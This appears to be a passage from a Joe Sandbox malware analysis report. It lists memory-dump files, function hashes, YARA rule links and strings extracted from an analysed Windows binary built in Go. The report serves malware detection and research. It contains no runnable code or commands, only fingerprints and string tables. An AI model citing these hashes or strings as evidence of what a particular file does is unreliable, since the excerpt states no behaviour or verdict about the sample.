            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExA$ MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 resetsrmount error$pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStub
            • API String ID: 0-2054791011
            • Opcode ID: 6ab07b791a32386c2e199900fdc99407bea50b0531b5fea179034f53bda5633e
            • Instruction ID: 53836f9b7113bc42911b30f1c279138115ee3055f89f978968a34337d68e7871
            • Opcode Fuzzy Hash: 6ab07b791a32386c2e199900fdc99407bea50b0531b5fea179034f53bda5633e
            • Instruction Fuzzy Hash: 1C71D572914F58C6D651EB21E4407AAB7A5FB8ABC0F45932EEE4D27725CF38C481C750
            Function 006EC240 Relevance: 3.6, Strings: 2, Instructions: 1095COMMON
            Download Yara Rule
            Strings
            • selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorywirep: already in goinvalid request codebad font file formatis a named type filekey has been revokedconnection timed outCreateProcessAsUserWCryptAcquireContextW, xrefs: 006ECE9B
            • gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB S, xrefs: 006ECEC5
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB S$selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubdodeltimer0: wrong Ptrace: out of memorywirep: already in goinvalid request codebad font file formatis a named type filekey has been revokedconnection timed outCreateProcessAsUserWCryptAcquireContextW
            • API String ID: 0-4035790957
            • Opcode ID: b8e3cd42f6f2e5b76e556f9bb3947d0dcece9a8f0e239aa72b5ae2a3498d1738
            • Instruction ID: ba0d0ba2b82b9126d2048cbbb5f750958eac83b19bcbdcd64790eadb3d35c37b
            • Opcode Fuzzy Hash: b8e3cd42f6f2e5b76e556f9bb3947d0dcece9a8f0e239aa72b5ae2a3498d1738
            • Instruction Fuzzy Hash: B5B27632205BD0C2C760DF16E4487AA77AAF388B94F569226EFAD47795CF78C895C700
            Function 006BBBC0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
            Download Yara Rule
            Strings
            • gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakri, xrefs: 006BBD94
            • Ap, xrefs: 006BBCF8
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: Ap$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakri
            • API String ID: 0-2571406733
            • Opcode ID: 4172e993bc7a3d23ff21589dd4fdc14b94e06ebe549206449cae62d4e5818d0f
            • Instruction ID: 1c68a9e2ce578042fc0bf0c18b16ccfbfb9574d47e12a5ad93e45e7aa94e7cf7
            • Opcode Fuzzy Hash: 4172e993bc7a3d23ff21589dd4fdc14b94e06ebe549206449cae62d4e5818d0f
            • Instruction Fuzzy Hash: 5B81AD32608B80C6D741DF21E4853EABBA5F389790F45923AEA9D437B5DFB9C185CB04
            Function 006D3F00 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
            Download Yara Rule
            Strings
            • runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:, xrefs: 006D40A5
            • runtime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=strings.Reader.Seek: invalid whencenetwork dropped connection on resettransport endpo, xrefs: 006D4115
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: runtime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=strings.Reader.Seek: invalid whencenetwork dropped connection on resettransport endpo$runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:
            • API String ID: 0-195534986
            • Opcode ID: b770c11933c18fa86a3a34a9fc545b44bec93bfca5f5049210cccb168b5bb673
            • Instruction ID: f8d5756d790b08c661ad079244a7bdc6bf500af0b30aced5d7b1bb1747f31344
            • Opcode Fuzzy Hash: b770c11933c18fa86a3a34a9fc545b44bec93bfca5f5049210cccb168b5bb673
            • Instruction Fuzzy Hash: E651D332A0975486CB64DB25E04137BBBB2F786BA0F09462BEB9D43795CF3CC8418B55
            Function 006EF980 Relevance: 1.7, Strings: 1, Instructions: 441COMMON
            Download Yara Rule
            Strings
            • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006EFA8D, 006EFB96, 006EFCD7, 006EFDFF
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
